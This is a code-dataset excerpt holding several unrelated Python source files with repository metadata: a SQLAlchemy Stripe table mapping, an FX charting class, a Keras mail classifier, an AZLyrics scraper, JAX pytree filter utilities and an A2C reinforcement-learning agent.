        closer_to_opener = {'}': '{', ')': '(', ']': '['}
        pending = []
        for symbol in s:
            if symbol in openers:
                pending.append(symbol)
            elif not pending or pending.pop() != closer_to_opener[symbol]:
                # Closing bracket with nothing open, or a mismatched pair.
                return False
        # Valid only if every opener was consumed.
        return not pending
14645360815 | from sqlalchemy import Column, Identity, Integer, Table, list
from . import metadata
# Auto-generated SQLAlchemy table mapping for Stripe's balance_detail object.
# NOTE(review): the `list` used as the "available" column type comes from the
# `from sqlalchemy import ... list` line above, but SQLAlchemy exposes no
# `list` symbol -- that import fails, so this module cannot import as-is.
# Probably ARRAY or JSON was intended; confirm against the code generator.
BalanceDetailJson = Table(
    "balance_detailjson",
    metadata,
    Column("available", list, comment="Funds that are available for use"),
    Column("id", Integer, primary_key=True, server_default=Identity()),
)

# NOTE(review): the exported name "balance_detail.json" matches no symbol in
# this module (the table variable is `BalanceDetailJson`); confirm intent.
__all__ = ["balance_detail.json"]
| offscale/stripe-sql | stripe_openapi/balance_detail.py | balance_detail.py | py | 337 | python | en | code | 1 | github-code | 13 |
4965118748 | # coding: utf-8
# In[1]:
import pandas as pd
from pandas_highcharts.display import display_charts
import os
class financeMain:
    """Loads HistData FX price CSVs and renders relative-value charts with
    pandas-highcharts.

    NOTE(review): `pairList` is a *class* attribute shared by every instance,
    and most methods are classmethods whose first parameter is named `self`
    (it actually receives the class). Confirm this singleton-style design.
    """
    # pair symbol (e.g. 'EURUSD') -> normalised hourly OHLC DataFrame
    pairList={}
    # populated nowhere in this class -- apparently unused
    currencyList=[]
    def __init__(self):
        # NOTE(review): hard-coded Windows data path -- consider making it a
        # parameter.
        self.OpenAllFile(r'C:\\Users\\simnk\\workspace\\finance\\HISTDATA2015', 'H')
    # Open every file in the directory and load its data.
    @classmethod
    def OpenAllFile(self,directory,tf):
        fileNames = os.listdir(directory)
        for fileName in fileNames:
            # Pair symbol is encoded in the file name at chars 10..15
            # (HistData naming convention, e.g. 'HISTDATA..EURUSD..').
            pair=fileName[10:16]
            histData = pd.read_csv(directory + r'\\' + fileName, sep=';',
                                   names=('Time','Open','High','Low','Close', ''),
                                   index_col='Time', parse_dates=True)
            histData.index += pd.offsets.Hour(7) # 7-hour timezone offset
            # Convert to 1-hour bars because plotting tick data is too slow,
            # then rescale to 0 +/- fractions of the first close.
            self.pairList[pair]=self.TranData(self.TF_ohlc(histData, 'H'))
    # Build OHLC bars for the timeframe `tf` from df's data.
    @classmethod
    def TF_ohlc(self, df, tf):
        #x = df.resample(tf).ohlc()
        x = df.resample(tf).ohlc()
        O = x['Open']['open']
        H = x['High']['high']
        L = x['Low']['low']
        C = x['Close']['close']
        ret = pd.DataFrame({'Open': O, 'High': H, 'Low': L, 'Close': C},
                           columns=['Open','High','Low','Close'])
        return ret.dropna()
    # Rescale prices relative to the first close: value/first - 1, i.e. the
    # fractional change since the start of the series.
    @classmethod
    def TranData(self, histData):
        haba=histData['Close'][0]
        histData=histData/haba -1
        return histData
    # Show a relative-value chart for every currency found in the pairs.
    def ShowVersusAll(self):
        currencies=[]
        for key in self.pairList.keys():
            forward=key[:3]
            backward=key[3:6]
            if not forward in currencies:
                self.ShowVersusCurrency(forward)
                currencies.append(forward)
            if not backward in currencies:
                self.ShowVersusCurrency(backward)
                currencies.append(backward)
    # Show a chart of the given currency against all its counterparts.
    @classmethod
    def ShowVersusCurrency(self, currency):
        versusList={}
        for key in self.pairList.keys():
            forward=key[:3]
            backward=key[3:6]
            strVs='VS. '
            if currency==forward:
                # Base currency is the first half of the pair symbol.
                versusList[strVs + backward]=self.pairList[key]['Close']
            elif backward==currency:
                # Base currency is the second half: invert the series so it
                # still reads as "value of `currency`".
                versusList[strVs + forward]=self.pairList[key]['Close'] * -1
        df = pd.DataFrame(versusList)
        display_charts(df, chart_type="stock", title=currency+' '+strVs, grid=True)
        return df
    # Show a combined chart of three hard-coded pairs.
    @classmethod
    def ShowAll(self):
        df = pd.DataFrame({'EURUSD': self.pairList['EURUSD']['Close'],
                           'EURJPY': self.pairList['EURJPY']['Close'],
                           'USDJPY': self.pairList['USDJPY']['Close']})
        display_charts(df, chart_type="stock", title="MA cross", grid=True)
    # Show the chart for one pair.
    @classmethod
    def Show(self, pair):
        df = pd.DataFrame({pair: self.pairList[pair]['Close']})
        display_charts(df, chart_type="stock", title="MA cross", grid=True)
| KaiShimanaka/finance | financeMain.py | financeMain.py | py | 3,597 | python | en | code | 2 | github-code | 13 |
29278167162 | import numpy as np
import pandas as pd
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from keras.layers import Dropout
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
# Load and shuffle the training data (sample(frac=1) shuffles all rows).
training_data = pd.read_csv('datasets/new_train.csv').sample(frac=1).reset_index(drop=True)
# Official Kaggle test
test_data = pd.read_csv('datasets/new_test.csv')
test_kaggle = test_data.drop(columns = ['Id','day','month','hour'])
#test_kaggle = sc.fit_transform(test_kaggle)
# Column 11 is the label; features exclude ids and time columns.
train_y = training_data.iloc[:,11:12].values
train_x = training_data.drop(columns = ['Id','label','day','month','hour'])
# One-hot encode on the union of training and test rows so every category
# seen in either split gets a column.
X = train_x.append(test_kaggle, ignore_index = True).values
ohe = OneHotEncoder()
ohe.fit(X)
train_x = train_x.values
test_kaggle = ohe.transform(test_kaggle.values)
train_x = ohe.transform(train_x)
# Labels are one-hot encoded separately (4 classes, see the output layer).
train_y = ohe.fit_transform(train_y)
'''
sc = StandardScaler()
train_x = sc.fit_transform(train_x)
train_x = sc.fit_transform(test_kaggle)'''
# Hold out 10% of the training data for local evaluation.
train_x, test_x, train_y, test_y = train_test_split(train_x, train_y, test_size = 0.1)
# Neural network: input dropout -> one hidden ReLU layer -> 4-way softmax.
model = Sequential()
#model.add(Dropout(0.2, input_shape = (10,)))
model.add(Dropout(0.33, input_shape = (26586,)))
#model.add(Dense(10, input_dim=10, activation='relu'))
model.add(Dense(1000, activation='relu'))
model.add(Dense(4, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# training
history = model.fit(train_x, train_y, epochs=5, batch_size=64)
# Predict on the local hold-out split.
pred_test = model.predict(test_x)
# Convert softmax outputs back to class indices via argmax.
pred = list()
for i in range(len(pred_test)):
    pred.append(np.argmax(pred_test[i]))
# Convert the one-hot encoded hold-out labels back to class indices.
test = list()
for i in range(test_y.shape[0]):
    test.append(np.argmax(test_y[i]))
# Accuracy
a = accuracy_score(pred,test)
print('Accuracy is:', a*100)
# Predict on the official Kaggle test set and write the submission file.
pred_kaggle = model.predict(test_kaggle)
pred = list()
for i in range(len(pred_kaggle)):
    pred.append(np.argmax(pred_kaggle[i]))
pred_to_submit = pd.DataFrame(pred, columns=['label'])
pred_to_submit.to_csv("datasets/neural_networks_submission.csv", index=True, index_label='Id')
| MerlinEgalite/mail-classification | neural_network.py | neural_network.py | py | 2,402 | python | en | code | 0 | github-code | 13 |
22846164843 | # Get lyrics delivered to your CLI
import requests
from bs4 import BeautifulSoup
def lyrics_find(Artist, Song):
    """Fetch a song's lyrics from AZLyrics and print them to stdout.

    Returns the HTTP status code of the page request, or None when the
    request itself failed (network error, bad hostname, ...).
    """
    # Base URL to build on
    URL = 'https://www.azlyrics.com/lyrics/'
    # AZLyrics URLs are lowercase with spaces removed.
    Artist = Artist.lower().replace(" ", "")
    Song = Song.lower().replace(" ", "")
    # So our Bot doesn't get classified as a Bot
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0',
    }
    # Bug fix: the original caught its own re-raised Exception and then
    # returned `page.status_code` -- a NameError when requests.get() itself
    # raised (connection error), because `page` was never bound.
    try:
        page = requests.get(URL + Artist + '/' + Song + '.html', headers=headers)
    except requests.RequestException as err:
        print("Request failed: " + str(err))
        return None
    if not page:
        # Non-2xx response, typically 404 for an unknown artist/song.
        print("Cannot Find Song. Please Check The Artist's Name and Song Title. Response Status Code: "
              + str(page.status_code))
        return page.status_code
    # Parse HTML to Soup
    soup = BeautifulSoup(page.content, 'html.parser')
    # AZLyrics puts the lyrics in the second class-less <div> on the page.
    div_with_no_names = soup.findAll('div', class_=None)
    for index, divs in enumerate(div_with_no_names):
        if index == 1:
            print(divs.text)
            print('Lyrics From AZLyrics @ ' + URL + Artist + '/' + Song + '.html')
            return page.status_code
    # Page loaded but had an unexpected layout; still report the status.
    return page.status_code
if __name__ == "__main__":
# Get Artist Name and Song Title
Artist = input("Artist: ")
Song = input("Song Title: ")
lyrics_find(Artist, Song)
| roopeshvs/LyricsPy | lyrics.py | lyrics.py | py | 1,533 | python | en | code | 0 | github-code | 13 |
36697692882 | from typing import Any, Callable, List, Optional, Tuple, Union
from typing_extensions import get_args
import jax
import jax.numpy as jnp
from .custom_types import Array, MoreArrays, PyTree, TreeDef
from .deprecated import deprecated
#
# Filter functions
#
_array_types = get_args(Array)
_morearray_types = get_args(MoreArrays)
_arraylike_types = _morearray_types + (int, float, complex, bool)
# TODO: not sure if this is the best way to do this? In light of:
# https://github.com/google/jax/commit/258ae44303b1539eff6253263694ec768b8803f0#diff-de759f969102e9d64b54a299d11d5f0e75cfe3052dc17ffbcd2d43b250719fb0
def is_array(element: Any) -> bool:
    """Return True iff `element` is an array instance (one of the `Array` types)."""
    return isinstance(element, _array_types)
# Does _not_ do a try/except on jnp.asarray(element) because that's very slow.
def is_array_like(element: Any) -> bool:
    """Return True iff `element` is an array or a Python scalar (int, float,
    complex, bool) that `jnp.asarray` would accept."""
    return isinstance(element, _arraylike_types)
def is_inexact_array(element: Any) -> bool:
    """Return True iff `element` is an array with a floating/complex dtype."""
    return is_array(element) and jnp.issubdtype(element.dtype, jnp.inexact)
def is_inexact_array_like(element: Any) -> bool:
    """Return True iff `element` is inexact-array-like: an array with a
    floating/complex dtype, or a Python float/complex scalar."""
    return (
        isinstance(element, _morearray_types)
        and jnp.issubdtype(element.dtype, jnp.inexact)
    ) or isinstance(element, (float, complex))
#
# Filtering/combining
#
def _make_filter_tree(mask: Union[bool, Callable[[Any], bool]], arg: Any) -> bool:
if isinstance(mask, bool):
return mask
elif callable(mask):
return jax.tree_map(mask, arg)
else:
raise ValueError("`filter_spec` must consist of booleans and callables only.")
def filter(
    pytree: PyTree, filter_spec: PyTree, inverse: bool = False, replace: Any = None
) -> PyTree:
    """Keep the leaves of `pytree` selected by `filter_spec`, substituting
    `replace` for every other leaf. With `inverse=True` the selection is
    flipped."""
    keep = not bool(inverse)
    mask_tree = jax.tree_map(_make_filter_tree, filter_spec, pytree)

    def _choose(mask, leaf):
        return leaf if bool(mask) == keep else replace

    return jax.tree_map(_choose, mask_tree, pytree)
def partition(pytree: PyTree, filter_spec: PyTree, replace: Any = None) -> PyTree:
    """Split `pytree` into (selected, rest): leaves matching `filter_spec`
    land in the first tree, all other leaves in the second, with `replace`
    filling the holes in each."""
    mask_tree = jax.tree_map(_make_filter_tree, filter_spec, pytree)
    selected = jax.tree_map(
        lambda keep, leaf: leaf if keep else replace, mask_tree, pytree)
    rest = jax.tree_map(
        lambda keep, leaf: replace if keep else leaf, mask_tree, pytree)
    return selected, rest
def _combine(*args):
for arg in args:
if arg is not None:
return arg
return None
def _is_none(x):
    """`is_leaf` predicate: treat None as a leaf so `combine` can see holes."""
    return x is None
def combine(*pytrees: PyTree):
    """Merge trees produced by `partition`/`filter`: each output leaf is the
    first non-None leaf at that position across `pytrees` (None marks a hole)."""
    return jax.tree_map(_combine, *pytrees, is_leaf=_is_none)
#
# Deprecated
#
@deprecated(in_favour_of=filter)
def split(
    pytree: PyTree,
    filter_fn: Optional[Callable[[Any], bool]] = None,
    filter_tree: Optional[PyTree] = None,
) -> Tuple[List[Any], List[Any], List[bool], TreeDef]:
    """Deprecated. Flatten `pytree` and split its leaves into (true, false)
    lists according to exactly one of `filter_fn` / `filter_tree`; also
    returns the boolean mask and treedef that `merge` needs to reassemble."""
    validate_filters("split", filter_fn, filter_tree)
    flat, treedef = jax.tree_flatten(pytree)
    flat_true = []
    flat_false = []
    if filter_fn is None:
        # Leaf-by-leaf mask supplied as a pytree; its structure must match.
        which, treedef_filter = jax.tree_flatten(filter_tree)
        if treedef != treedef_filter:
            raise ValueError(
                "filter_tree must have the same tree structure as the PyTree being split."
            )
        for f, w in zip(flat, which):
            if w:
                flat_true.append(f)
            else:
                flat_false.append(f)
    else:
        # Predicate supplied: evaluate it per leaf and record the mask.
        which = []
        for f in flat:
            if filter_fn(f):
                flat_true.append(f)
                which.append(True)
            else:
                flat_false.append(f)
                which.append(False)
    return flat_true, flat_false, which, treedef
@deprecated(in_favour_of=combine)
def merge(
    flat_true: List[Any], flat_false: List[Any], which: List[bool], treedef: TreeDef
):
    """Reassemble a pytree previously taken apart by `split`.

    `which` dictates, leaf by leaf, whether the next value is drawn from
    `flat_true` or `flat_false`.
    """
    true_iter = iter(flat_true)
    false_iter = iter(flat_false)
    leaves = [next(true_iter) if flag else next(false_iter) for flag in which]
    return jax.tree_unflatten(treedef, leaves)
# Internal and only used by deprecated functions
def validate_filters(fn_name, filter_fn, filter_tree):
    # Exactly one of the two filter arguments must be supplied; both-or-neither
    # is ambiguous, so reject it.  (fn_given == tree_given) is true precisely
    # when both are None or both are non-None.
    fn_given = filter_fn is not None
    tree_given = filter_tree is not None
    if fn_given == tree_given:
        raise ValueError(
            f"Precisely one of `filter_fn` and `filter_tree` should be passed to {fn_name}"
        )
| codeaudit/equinox | equinox/filters.py | filters.py | py | 4,344 | python | en | code | null | github-code | 13 |
37127807934 | #For loop with string.
# Demo script: for-loops over strings, lists, and ranges.

# Commented-out example: iterate over the characters of user input.
# name= input("Enter your name. ")
# for ch in name:
#     print(ch)

# Iterating over a list prints each element in order.
phone_no_list = [9847620206, 9845007122, 9826835932, 9860181886, 9844375899, 9867773888]
for number in phone_no_list:
    print(number)

# Nested loops: the outer loop walks the list, the inner one walks each string.
name_list = ["Nirajan", "Saurav"]
for person in name_list:
    for letter in person:
        print(letter)
    print("\n")  # blank separator between names

# range(stop): 0 .. 9
for value in range(10):
    print(value)

# range(start, stop): 5 .. 9
for value in range(5, 10):
    print(value)

# range(start, stop, step): 5, 7, 9
for value in range(5, 10, 2):
    print(value)

# Accumulate a running total over a list of prices; `total` is printed by the
# line that follows this block.
prices = [30, 59, 75, 68]
total = 0
for cost in prices:
    total = total + cost
print("Total cost is ",total) | NirajanJoshi5059/python | for_loop.py | for_loop.py | py | 762 | python | en | code | 0 | github-code | 13 |
160299826 | """Implements the A2C Agent"""
# pylint: disable=E1129
import time
import tensorflow as tf
import numpy as np
from base_agent import BaseAgent
from layers import agent_network, fully_connected
from env_recorder import EnvRecorder
class A2CAgent(BaseAgent):
    """An Actor-Critic Advantage Network Agent"""
    def __init__(self, env_factory, state_dir):
        """Create the agent and its pool of parallel environments.

        env_factory: zero-argument callable returning a fresh environment.
        state_dir: forwarded to BaseAgent; presumably where checkpoints and
            summaries live -- TODO confirm against BaseAgent.
        """
        self.env_count = 16  # environments stepped in parallel
        self.t_steps = 5  # rollout segment length between gradient updates
        self.gamma = 0.99  # discount factor for n-step returns
        self.total_steps = 40e6  # total frames to train for
        self.starting_lr = 1e-3
        self.value_weight = 0.5  # weight of the critic (value) loss term
        self.entropy_weight = 0.01  # weight of the entropy bonus
        self.envs = []
        self.start_time = time.time()
        for _ in range(self.env_count):
            env = env_factory()
            self.envs.append(env)
            # Each env reports episode results back through `status`.
            env.info_cb = self.status
        super().__init__(self.envs[0], state_dir)
        print("A2C input shape ", self.state_shape)
    def _build_model(self):
        """Build the TF1 graph: shared network, actor/critic heads, loss, and
        episode-score statistics."""
        super()._build_model()
        with self.graph.as_default():
            with tf.variable_scope('network'):
                # Shared trunk producing policy logits and, via an extra FC
                # layer, a scalar value estimate per state.
                input_layer, final_layer, predict_layer = agent_network(
                    state_shape=self.state_shape,
                    image_input=self.image_input,
                    action_count=self.action_count)
                self.input_layer = input_layer
                self.predict_layer = predict_layer  # raw policy logits
                self.softmax_predict = tf.nn.softmax(self.predict_layer)
                self.value_layer = fully_connected(
                    final_layer, 1, activation=None, name="value")
                self.value_layer_val = self.value_layer[:, 0]  # squeezed to 1-D
            with tf.variable_scope('state'):
                # Persistent frame counter; `act` bumps it by the batch size
                # through `update_frames`.
                self._frames = tf.Variable(
                    0, trainable=False, name='frames', dtype=tf.int64)
                tf.summary.scalar('frames', self._frames)
                self.update_frames = tf.assign_add(self._frames,
                    tf.cast(tf.shape(self.input_layer)[0], tf.int64))
                lr_calc = self.starting_lr * \
                    (1.0 - (tf.cast(self._frames, tf.float64) / self.total_steps))
                # self.learning_rate = tf.maximum(tf.cast(0.0, tf.float64), lr_calc)
                # NOTE(review): `lr_calc` (linear decay) is computed but never
                # used -- a constant learning rate is in effect; verify intent.
                self.learning_rate = tf.constant(self.starting_lr)
                tf.summary.scalar('learning_rate', self.learning_rate)
            with tf.variable_scope('training'):
                self.target_predict = tf.placeholder(
                    tf.int32, shape=[None], name='target_predict')  # taken actions
                self.target_value = tf.placeholder(
                    tf.float32, shape=[None], name='target_value')  # n-step returns
                self.reward_diff = tf.placeholder(
                    tf.float32, shape=[None], name='reward_diff')  # advantages
                # Critic loss: half mean squared error against the returns.
                mse_value = tf.reduce_mean(tf.squared_difference(
                    self.value_layer, self.target_value) / 2.)
                tf.summary.scalar('mse_value', mse_value)
                # Actor loss: advantage-weighted cross-entropy of taken actions.
                diff_predict = tf.reduce_mean(
                    self.reward_diff * tf.nn.sparse_softmax_cross_entropy_with_logits(
                        logits=self.predict_layer, labels=self.target_predict))
                tf.summary.scalar('err_predict', diff_predict)
                # Numerically stable softmax entropy via the max-shift trick.
                a0 = self.predict_layer - \
                    tf.reduce_max(self.predict_layer, axis=1, keep_dims=True)
                ea0 = tf.exp(a0)
                z0 = tf.reduce_sum(ea0, axis=1, keep_dims=True)
                p0 = ea0 / z0
                # entropy = tf.reduce_mean(-tf.reduce_sum(self.softmax_predict * tf.log( self.softmax_predict + 1e-6), axis=1)) # adding 1e-6 to avoid DBZ
                entropy = tf.reduce_mean(tf.reduce_sum(
                    p0 * (tf.log(z0) - a0), axis=1))
                tf.summary.scalar('predict_entropy', entropy)
                trainer = tf.train.RMSPropOptimizer(
                    self.learning_rate, decay=0.99, epsilon=1e-5)
                # Total loss: actor + weighted critic - entropy bonus.
                loss = diff_predict + self.value_weight * mse_value - self.entropy_weight * entropy
                tf.summary.scalar('loss', loss)
                # self.train_op = trainer.minimize(loss, global_step=self._step)
                # Global-norm gradient clipping at 0.5 before applying updates.
                grads_and_vars = trainer.compute_gradients(loss)
                grads, vars = zip(*grads_and_vars)
                grads, _ = tf.clip_by_global_norm(grads, 0.5)
                grads_and_vars = list(zip(grads, vars))
                self.train_op = trainer.apply_gradients(
                    grads_and_vars, global_step=self._step)
            with tf.variable_scope('stats'):
                # Episode-score trackers: the raw latest score plus exponential
                # moving averages with ~100- and ~1000-episode horizons.
                self.score_placeholder = tf.placeholder(
                    tf.float32, shape=[], name='score_input')
                score_1 = tf.Variable(0., trainable=False, name='score_1')
                tf.summary.scalar('score_1', score_1)
                score_100 = tf.Variable(0., trainable=False, name='score_100')
                tf.summary.scalar('score_100', score_100)
                score_1000 = tf.Variable(
                    0., trainable=False, name='score_1000')
                tf.summary.scalar('score_1000', score_1000)
                self.set_scores = tf.group(
                    tf.assign(score_1, self.score_placeholder),
                    tf.assign(
                        score_100,
                        score_100 + (self.score_placeholder / 100.0) - (score_100 / 100.0)),
                    tf.assign(
                        score_1000,
                        score_1000 + (self.score_placeholder / 1000.0) - (score_1000 / 1000.0)),
                )
    @property
    def frames(self):
        # Current value of the persistent frame counter variable.
        return self.session.run(self._frames)
    def status(self, env: EnvRecorder):
        """Episode-end callback: folds the episode score into the moving
        averages and returns (name, value) pairs for progress display."""
        score = env.ep_score
        _, frame, step, learning_rate = self.session.run(
            [self.set_scores, self._frames, self._step, self.learning_rate],
            {self.score_placeholder: score})
        # Average wall-clock seconds per frame since training started.
        per_frame = (time.time() - self.start_time) / frame
        return [
            ('frame', frame),
            ('step', step),
            ('perframe', '{:.6f}'.format(per_frame)),
            ('lr', '{:.2e}'.format(learning_rate)),
        ]
    def act(self, states):
        """Returns action for each given state"""
        # Side effect: `update_frames` bumps the frame counter by the batch size.
        preds, values, _ = self.session.run(
            [self.softmax_predict, self.value_layer_val, self.update_frames],
            {self.input_layer: states})
        # noise = np.random.uniform(size=np.shape(preds))
        # return np.argmax(preds, axis=1)
        # return np.argmax(preds - np.log(-np.log(noise)), axis=1), values
        # Sample each action from the softmax policy distribution.
        return [np.random.choice(self.action_count, p=pred) for pred in preds], values
    def value(self, states):
        """Returns predicted value for each given state"""
        vals = self.session.run(self.value_layer, {self.input_layer: states})
        return np.squeeze(vals, axis=1)
    def fit(self, states, actions, rewards, values):
        """Run one gradient step on a batch of rollout data.

        rewards: discounted n-step returns; values: critic estimates recorded
        when acting.  Their difference is the advantage fed to the actor loss.
        """
        diff = rewards - values
        _, summary, step = self.session.run(
            [self.train_op, self.summary_data, self._step],
            {self.input_layer: states,
             self.target_value: rewards,
             self.target_predict: actions,
             self.reward_diff: diff})
        # Write summaries only every 50th step to keep the event file small.
        if step % 50 == 0:
            self.writer.add_summary(summary, step)
    class RunEnv:
        # Per-environment rollout bookkeeping: buffers one t_steps segment of
        # states/actions/rewards/values for a single environment.
        def __init__(self, env):
            self.env = env
            self.done = False  # episode terminated during the current segment
            self.reset = True  # env must be reset before the next segment
            self.current_state = None
            self.states = []
            self.actions = []
            self.rewards = []
            self.values = []
        @property
        def active(self):
            # An env is stepped only while it has not requested a reset.
            return not self.reset
        def prepare(self):
            # Clear the segment buffers and reset the env if the last episode
            # ended.
            self.states.clear()
            self.actions.clear()
            self.rewards.clear()
            self.values.clear()
            if self.reset:
                self.current_state = self.env.reset()
                self.reset = False
        def async_step(self, action):
            # Kick off a non-blocking step when the env supports it, so all
            # envs can advance concurrently before results are collected.
            if hasattr(self.env, 'async_step'):
                self.env.async_step(action)
        def step(self, action, value):
            # Record the transition and advance the env by one step.
            self.states.append(self.current_state)
            self.actions.append(action)
            self.values.append(value)
            next_state, reward, self.done, self.reset = self.env.step(action)
            # Clip rewards to {-1, 0, 1}
            # This is done here so that the EnvRecorder wrapper can still report the
            # real score rather than the clipped score.
            # NOTE(review): clipping is currently disabled (the np.sign line is
            # commented out); raw rewards are stored.
            # reward = np.sign(reward)
            self.rewards.append(reward)
            self.current_state = next_state
    def run(self):
        """Main training loop: collect a t_steps rollout from every env,
        compute discounted bootstrapped returns, and fit -- repeating until
        `total_steps` frames have been consumed."""
        self.start_time = time.time()
        run_envs = [self.RunEnv(env) for env in self.envs]
        last_save = 0
        while self.frames < self.total_steps:
            # Periodic checkpointing roughly every 100k frames.
            if self.frames - last_save > 100000:
                self._save()
                last_save = self.frames
            all_states = []
            all_actions = []
            all_rewards = []
            all_values = []
            for env in run_envs:
                env.prepare()
            for _ in range(self.t_steps):
                # Envs whose episode ended drop out for the rest of the segment.
                envs = [env for env in run_envs if env.active]
                if len(envs) == 0:
                    break
                states = [env.current_state for env in envs]
                actions, values = self.act(states)
                # Fire all steps asynchronously first, then collect results.
                for env, action in zip(envs, actions):
                    env.async_step(action)
                for env, action, value in zip(envs, actions, values):
                    env.step(action, value)
            # Critic bootstrap values for each env's final state.
            values = self.value([env.current_state for env in run_envs])
            for env, value in zip(run_envs, values):
                total_rewards = [0] * len(env.rewards)
                if not env.done:
                    # Episode still running: bootstrap the tail from the critic;
                    # otherwise the terminal value stays 0.
                    total_rewards[-1] = value
                # NOTE(review): env.rewards[-1] never enters total_rewards (the
                # last slot holds only the bootstrap/0, and the backward loop
                # starts at len-2), so the final reward of every segment is
                # dropped -- looks like a bug; verify.
                for idx in range(len(env.rewards) - 2, -1, -1):
                    total_rewards[idx] = env.rewards[idx] + \
                        self.gamma * total_rewards[idx + 1]
                assert len(env.states) == len(env.actions)
                assert len(env.states) == len(total_rewards)
                all_states += env.states
                all_actions += env.actions
                all_values += env.values
                all_rewards += total_rewards
            self.fit(all_states, all_actions, np.array(all_rewards), np.array(all_values))
        for env in self.envs:
            env.close()
        self._save()
| codekitchen/udacity_machine_learning | capstone_project/a2c_agent.py | a2c_agent.py | py | 10,458 | python | en | code | 0 | github-code | 13 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.